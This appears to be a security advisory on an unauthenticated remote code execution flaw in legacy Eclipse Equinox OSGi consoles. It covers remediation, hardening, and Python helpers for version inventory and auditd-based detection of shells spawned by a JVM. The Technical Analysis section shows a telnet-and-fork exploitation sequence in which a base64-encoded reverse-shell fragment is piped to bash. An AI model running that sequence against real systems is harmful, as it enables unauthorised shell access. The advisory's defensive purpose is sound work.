CVE-2023-54344: Eclipse Equinox OSGi Unauthenticated Remote Code Execution
Eclipse Equinox OSGi versions 3.7.2 and earlier are affected by a critical remote code execution vulnerability tracked as CVE-2023-54344 (CVSS 9.8, Critical). Similar to its companion vulnerability CVE-2023-54342 (which covers versions 3.8 through 3.18), this flaw allows unauthenticated attackers to execute arbitrary OS commands by connecting to the OSGi console port and sending base64-encoded bash command payloads wrapped in the fork command.
Together, CVE-2023-54342 and CVE-2023-54344 represent a complete family of OSGi console RCE vulnerabilities covering the entirety of Eclipse Equinox versions that expose a console interface — making the attack surface significantly broader than either CVE alone.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2023-54344 |
| CVSS Score | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE Classification | CWE-78 — Improper Neutralization of Special Elements in OS Commands |
| Affected Software | Eclipse Equinox OSGi 3.7.2 and earlier |
| Attack Vector | Network — telnet to exposed OSGi console port |
| Authentication Required | None |
| Scope | Unchanged — host system command execution |
| Published | 2026-05-05 (NVD) |
Relationship to CVE-2023-54342
CVE-2023-54342 and CVE-2023-54344 are companion vulnerabilities that together span all vulnerable Eclipse Equinox OSGi releases:
| CVE | Affected Versions | Technique |
|---|---|---|
| CVE-2023-54342 | 3.8 through 3.18 | Fork command payload execution |
| CVE-2023-54344 | 3.7.2 and earlier | Base64-encoded bash via fork |
The older CVE-2023-54344 variant is relevant to organizations still running legacy OSGi deployments on Eclipse 3.x-era infrastructure — a common scenario in long-lived enterprise Java environments where upgrade cycles are slow.
Technical Analysis
Attack Vector: OSGi Console Fork Command
The Eclipse Equinox OSGi console is a runtime management interface accessible over telnet. The fork command is designed to execute external programs from within the framework context. In affected versions 3.7.2 and earlier, this command accepts base64-encoded shell commands without sanitization, enabling arbitrary OS command execution:
```
# Step 1: Connect to the OSGi console telnet port
telnet target-host 7777

# Step 2: Execute base64-encoded bash payload via fork
osgi> fork [base64::echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9z" | base64 -d | bash]

# Result: remote shell spawned as JVM process owner
```
The mechanism differs slightly from CVE-2023-54342: CVE-2023-54344 specifically involves the base64 encoding wrapper that older Equinox versions process before passing the command to the OS shell layer, which lets attackers bypass any naive keyword filtering on console input.
Why Legacy Versions Remain Deployed
Eclipse Equinox 3.7.2 and earlier maps to Eclipse IDE releases from the 2012–2015 era. While these versions are outdated, they remain in production in:
- Long-running enterprise OSGi applications built and never migrated
- Embedded industrial control systems using Java OSGi runtimes
- Legacy Eclipse RCP applications that enterprise vendors have not updated
- CI/CD toolchains using old Eclipse-based build infrastructure
These deployments are often poorly tracked, and console ports that were opened years ago for troubleshooting may still be exposed without anyone remembering they exist.
Exploitation Scenarios
Scenario 1: Exposed Console Port in Enterprise Network
An internal service running Eclipse Equinox 3.6 exposes port 7777 on a server segment accessible to development teams. An attacker with internal network access (or via lateral movement from another compromised host) connects over telnet and gains RCE without any credentials.
Scenario 2: Internet-Exposed Legacy Application Server
A Java-based application server using Equinox 3.7 has its OSGi console port inadvertently exposed to the internet through a misconfigured firewall rule. An external attacker discovers the open port via automated scanning and achieves unauthenticated RCE.
Scenario 3: Industrial Control System
An OT environment uses an Eclipse RCP-based SCADA application with Equinox 3.5. The OSGi console port is used by on-site engineers for troubleshooting. An attacker who gains network access to the OT segment uses CVE-2023-54344 to pivot through the SCADA host into deeper industrial network segments.
Impact Assessment
| Impact Area | Description |
|---|---|
| Full RCE | Arbitrary OS commands executed as the JVM process owner |
| No Authentication | Zero prerequisites beyond network reach to the console port |
| Legacy Deployment Risk | Older Equinox versions are common in unmaintained or poorly-tracked deployments |
| Privilege Escalation | If JVM runs as root or elevated user, immediate full system compromise |
| OT/ICS Risk | Eclipse-based industrial applications may run on isolated but critical network segments |
| Data Exfiltration | Unrestricted access to process-accessible files, credentials, and environment variables |
Remediation
Primary Fix: Upgrade Eclipse Equinox
For applications using Equinox 3.7.2 or earlier, upgrade to a patched version. Given that 3.7.2 is significantly outdated, organizations should target upgrading to a current supported Equinox version from the Eclipse Foundation, which also brings substantial security improvements beyond this specific CVE.
Immediate Mitigations
1. Disable the OSGi console:
The fastest remediation for production systems is disabling the console entirely. Remove the -console JVM argument from your startup scripts:
```shell
# BEFORE (vulnerable)
java -jar equinox.jar -console

# AFTER (mitigated)
java -jar equinox.jar
```
2. Restrict console port access via firewall:
If the console cannot be disabled, restrict access immediately:
```shell
# Block external access to the default OSGi console port
iptables -A INPUT -p tcp --dport 7777 -j DROP
# Insert the loopback allow rule ahead of the DROP so local administration keeps working
iptables -I INPUT -p tcp --dport 7777 -s 127.0.0.1 -j ACCEPT
```
3. Bind to loopback only:
Use the -console localhost:PORT argument to prevent remote connections:
```shell
java -jar equinox.jar -console localhost:7777
```
4. Audit all Java deployments for Equinox versions:
Identify all instances of Eclipse Equinox across your environment:
```shell
# Find Equinox OSGi JAR files
find / -name "org.eclipse.osgi_*.jar" 2>/dev/null

# Check manifest version
unzip -p org.eclipse.osgi_3.7.2.v*.jar META-INF/MANIFEST.MF | grep Bundle-Version
```
Detection
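Before looking for open ports, it helps to know which installed framework JARs actually fall inside the affected ranges. The following Python helper is an added example, not part of this advisory and not Eclipse project code: it reads Bundle-Version from an Equinox JAR's manifest (the unzip/grep check from the audit step, automated) and maps it onto the two ranges the advisory states. The JAR contents and the `.vPLACEHOLDER` qualifiers are constructed; a real scan would feed it the paths returned by the find command.

```python
"""Inventory helper for the audit step: read Bundle-Version from an Equinox
framework JAR and map it onto the ranges this advisory gives
(3.7.2 and earlier -> CVE-2023-54344; 3.8 through 3.18 -> CVE-2023-54342).
Added example, not advisory or Eclipse code; sample JARs are built in memory."""
import io
import re
import zipfile
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# Inclusive boundaries exactly as the advisory states them.
CVE_2023_54344_MAX: Version = (3, 7, 2)
CVE_2023_54342_MIN_MINOR = (3, 8)
CVE_2023_54342_MAX_MINOR = (3, 18)


def unfold_manifest(text: str) -> Dict[str, str]:
    """Parse a JAR manifest into a header -> value dict.
    A line starting with a space continues the previous header (JAR spec)."""
    headers: Dict[str, str] = {}
    last: Optional[str] = None
    for raw in text.splitlines():
        if raw.startswith(" ") and last is not None:
            headers[last] += raw[1:]
            continue
        if ":" not in raw:
            last = None  # blank line or junk ends any continuation
            continue
        name, _, value = raw.partition(":")
        last = name.strip()
        headers[last] = value.strip()
    return headers


def parse_bundle_version(manifest_text: str) -> Optional[Version]:
    """Return (major, minor, micro) from Bundle-Version; the qualifier is ignored."""
    value = unfold_manifest(manifest_text).get("Bundle-Version")
    if value is None:
        return None
    m = re.match(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?", value)
    if not m:
        return None
    major, minor, micro = (int(g) if g else 0 for g in m.groups())
    return (major, minor, micro)


def classify(version: Version) -> str:
    """Name the CVE whose stated range contains this version, if any."""
    if version <= CVE_2023_54344_MAX:
        return "CVE-2023-54344"
    if CVE_2023_54342_MIN_MINOR <= version[:2] <= CVE_2023_54342_MAX_MINOR:
        return "CVE-2023-54342"
    return "outside the ranges stated in the advisory"


def classify_jar(jar_bytes: bytes) -> str:
    """Open a JAR (as bytes) and classify its framework version."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8")
    version = parse_bundle_version(manifest)
    return classify(version) if version is not None else "no Bundle-Version header"


def build_sample_jar(bundle_version: str) -> bytes:
    """Constructed stand-in for org.eclipse.osgi_*.jar; only the manifest matters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "META-INF/MANIFEST.MF",
            "Manifest-Version: 1.0\r\n"
            "Bundle-SymbolicName: org.eclipse.osgi; singleton:=true\r\n"
            f"Bundle-Version: {bundle_version}\r\n\r\n",
        )
    return buf.getvalue()


if __name__ == "__main__":
    # The ".vPLACEHOLDER" qualifiers below are not real Equinox build ids.
    for v in ("3.7.2.vPLACEHOLDER", "3.6.1.vPLACEHOLDER",
              "3.12.50.vPLACEHOLDER", "3.19.0.vPLACEHOLDER"):
        print(f"{v:24} -> {classify_jar(build_sample_jar(v))}")
```

Versions above 3.18 are reported as outside the advisory's stated ranges rather than as safe, because the advisory says nothing about them; the manifest parser honours continuation lines so a wrapped Bundle-Version header is still read correctly.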
```shell
# Identify open OSGi console ports via nmap
nmap -p 7777 --open <network-range>

# Verify console exposure with telnet banner check
echo "" | nc -w 2 <target> 7777

# Monitor process execution spawned by JVM
auditctl -a always,exit -F arch=b64 -S execve -F comm=java
```
Review system logs for unexpected child processes created by your Java services; legitimate OSGi applications should not be spawning shell processes.
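The auditctl rule above yields SYSCALL/EXECVE record pairs that have to be read together to see who spawned what. The following Python script is an added example of that review step, not part of the advisory: it correlates the two record types by audit event id, decodes the hex-encoded argv entries auditd emits for arguments containing spaces, and raises an alert whenever a shell is executed with a JVM as its parent. All log lines are constructed; the pids, uids, paths and timestamps are placeholders, and the `known_jvm_pids` parameter and `SHELL_EXES` list are this example's own choices.

```python
"""Review JVM-spawned child processes from auditd execve records.
Added example for the detection step; not part of the advisory. Every log line,
pid, uid, path and timestamp below is constructed, not captured from a real host."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Constructed records in raw auditd format. Event 202 is a shell whose parent
# (pid 4242) is the JVM; event 203 is an unrelated interactive shell.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=4242 auid=4294967295 uid=1001 gid=1001 comm="java" exe="/usr/lib/jvm/java-8/bin/java" key="exec"
type=EXECVE msg=audit(1700000000.101:201): argc=4 a0="java" a1="-jar" a2="equinox.jar" a3="-console"
type=SYSCALL msg=audit(1700000000.250:202): arch=c000003e syscall=59 success=yes exit=0 ppid=4242 pid=4300 auid=4294967295 uid=1001 gid=1001 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000000.250:202): argc=3 a0="bash" a1="-c" a2=6563686F2074657374
type=SYSCALL msg=audit(1700000000.300:203): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=4400 auid=1000 uid=1000 gid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1700000000.300:203): argc=1 a0="bash"
"""

JVM_EXE_SUFFIX = "/bin/java"
SHELL_EXES = {"/bin/sh", "/usr/bin/sh", "/bin/bash", "/usr/bin/bash",
              "/bin/dash", "/usr/bin/dash"}
EXECVE_X86_64 = "59"  # syscall number for execve on arch=b64 (x86_64)

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
ID_RE = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")


def decode_hex_arg(raw: str) -> str:
    """auditd hex-encodes an argv entry (and drops the quotes) when it contains
    spaces or control characters; quoted entries never reach this function."""
    if len(raw) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw


def parse_record(line: str) -> Dict[str, str]:
    """Split one raw audit line into a field dict plus the event id under '_id'."""
    fields: Dict[str, str] = {}
    for key, raw in KV_RE.findall(line):
        if raw.startswith('"'):
            fields[key] = raw[1:-1]
        elif re.fullmatch(r"a\d+", key):
            fields[key] = decode_hex_arg(raw)
        else:
            fields[key] = raw
    m = ID_RE.search(line)
    fields["_id"] = m.group(1) if m else ""
    return fields


def find_jvm_spawned_shells(log_text: str,
                            known_jvm_pids: Iterable[str] = ()) -> List[Dict[str, str]]:
    """Return one alert per execve of a shell whose parent pid belongs to a JVM.

    JVM pids come from the JVM's own execve record in the log plus any the
    caller supplies (in production, seed from the process table, e.g. the
    output of `pgrep -x java`, since the JVM's startup may predate log retention)."""
    syscalls: Dict[str, Dict[str, str]] = {}
    argv: Dict[str, List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec.get("type") == "SYSCALL" and rec.get("syscall") == EXECVE_X86_64:
            syscalls[rec["_id"]] = rec
        elif rec.get("type") == "EXECVE":
            argc = int(rec.get("argc", "0"))
            argv[rec["_id"]] = [rec.get(f"a{i}", "") for i in range(argc)]

    # Match on the parent pid rather than comm: on an execve SYSCALL record,
    # comm and exe already describe the newly executed image, not its caller.
    jvm_pids = set(known_jvm_pids) | {
        r["pid"] for r in syscalls.values() if r.get("exe", "").endswith(JVM_EXE_SUFFIX)
    }
    alerts: List[Dict[str, str]] = []
    for event_id, rec in sorted(syscalls.items(), key=lambda kv: int(kv[0] or 0)):
        if rec.get("ppid") in jvm_pids and rec.get("exe") in SHELL_EXES:
            alerts.append({
                "event": event_id,
                "jvm_pid": rec["ppid"],
                "pid": rec["pid"],
                "uid": rec.get("uid", ""),
                "exe": rec["exe"],
                "cmdline": " ".join(argv.get(event_id, [])),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_jvm_spawned_shells(SAMPLE_AUDIT_LOG):
        print("ALERT shell spawned by JVM:", alert)
```

Run against the constructed log this reports exactly one alert, event 202, with the decoded command line `bash -c echo test`; the unrelated shell in event 203 is ignored because its parent is not a JVM. Feed it `ausearch --raw` output or the audit.log file directly, and pass the live JVM pids in `known_jvm_pids` so a JVM started before log rotation is still recognised.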
OSGi Security Hardening Checklist
For any production Eclipse Equinox deployment, regardless of version:
- Disable OSGi console (-console) in production environments
- If console required, bind to localhost only (-console localhost:PORT)
- Firewall all management ports from external and untrusted network segments
- Run JVM processes as least-privilege service accounts
- Inventory all Equinox versions deployed across your environment
- Apply Eclipse Equinox security updates promptly
- Enable process auditing to detect unexpected child process execution from JVM processes
Key Takeaways
- CVE-2023-54344 (CVSS 9.8) and companion CVE-2023-54342 together cover all Eclipse Equinox OSGi versions that expose a console interface — treat both as a single vulnerability family requiring coordinated remediation
- Equinox 3.7.2 and earlier represent legacy-era deployments that are often poorly inventoried and may have forgotten exposed console ports
- Disabling the OSGi console is the fastest risk reduction — production environments have no legitimate need for an exposed telnet management port
- Base64 encoding in the payload suggests attackers have developed evasion techniques for any naive console input filtering; only version upgrades or console disablement are reliable mitigations
- Industrial and embedded Java environments using old Eclipse RCP applications are at particular risk and should be audited immediately